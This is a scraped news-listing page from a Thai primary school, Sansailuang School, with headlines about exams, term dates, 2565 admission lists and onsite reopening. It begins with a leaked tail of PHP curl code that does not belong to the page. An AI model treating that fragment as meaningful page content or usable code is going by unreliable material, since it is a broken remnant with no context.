$e=curl_exec($d); curl_close($d); return $e; } ?> ข่าวประชาสัมพันธ์ - Sansailuang School | https://ssl.ac.th

ข่าวประชาสัมพันธ์

แก้ไข ประกาศวันปิดภาคเรียนของนักเรียนชั้นประถมศึกษา

ประกาศโรงเรียนสันทรายหลวง เรื่อง การสอบของนักเรียนชั้นประถม ..

ประกาศรายชื่อนักเรียนชั้นอ.2 อ.3 และชั้น ป.1 ปีการศึกษา 2565..

ประกาศรายชื่อนักเรียน ป.1 ปีการศึกษา 2565

ประกาศเลื่อนการเปิดเรียนแบบ Onsite

ประกาศ ผลการรับนักเรียนใหม่ ระดับชั้นอนุบาล 2 ประจำปี 2565

ประกาศหยุดเรียน

ประกาศรับสมัครนักเรียนปีการศึกษา 2565

ประกาศเปิดเรียนOn Site ป.2 ถึง ป.5

ประกาศเปิดเรียน

ประกาศแนวทางปฏิบัติในการเปิดเรียนแบบ On-site

ข้อสรุปจากการประชุมผู้ปกครองออนไลน์ ในวันอาทิตย์ ที่ 19 ธันว..